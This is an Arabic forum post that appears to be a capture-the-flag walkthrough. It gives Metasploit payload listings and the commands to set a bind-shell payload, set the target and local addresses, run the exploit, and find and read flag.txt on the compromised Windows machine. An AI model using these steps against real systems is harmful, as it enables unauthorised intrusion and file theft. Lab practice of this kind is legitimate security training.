   1382  payload/windows/x64/vncinject/reverse_tcp_uuid                                              normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   1383  payload/windows/x64/vncinject/reverse_winhttp                                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   1384  payload/windows/x64/vncinject/reverse_winhttps                                              normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
تجربه امثله
3b0-0d قال:
الامر التالي show payloads ليظهر ال payloads


يمكن استخدام اكثر من بايلود لكن

عن طريق بايلود payload/generic/shell_bind_tcp

اكتب الامر set payload 2 ليتم تعين ال payload

بعدها قم بتعيين القيم التاليه LHOST,RHOST
مثل

set RHOSTS 10.10.89.140

set LHOST 10.8.119.34

  • علما ان 👇
ال ip : RHOSTS الجهاز المستهدف
و
ال ip : LHOSTS جهازي

1700515855605.png


بعدها اكتب run

1700515869926.png


بعد الدخول نبحث عن اسم الملف الذي حصلنا عليه من السؤال

1700515878831.png


عن طريق الامر التالي يمكن البحث عن الملف dir C:\flag.txt /s
او
عن طريق الامر التالي يمكن البحث عن الملف search -f flag.txt

1700515889870.png


يمكن عرض ما بداخله عن طريق امر type C:\Users\Jon\Documents\flag.txt

1700515895809.png
 
التعديل الأخير بواسطة المشرف:

آخر المشاركات

فانوس

رمضان
عودة
أعلى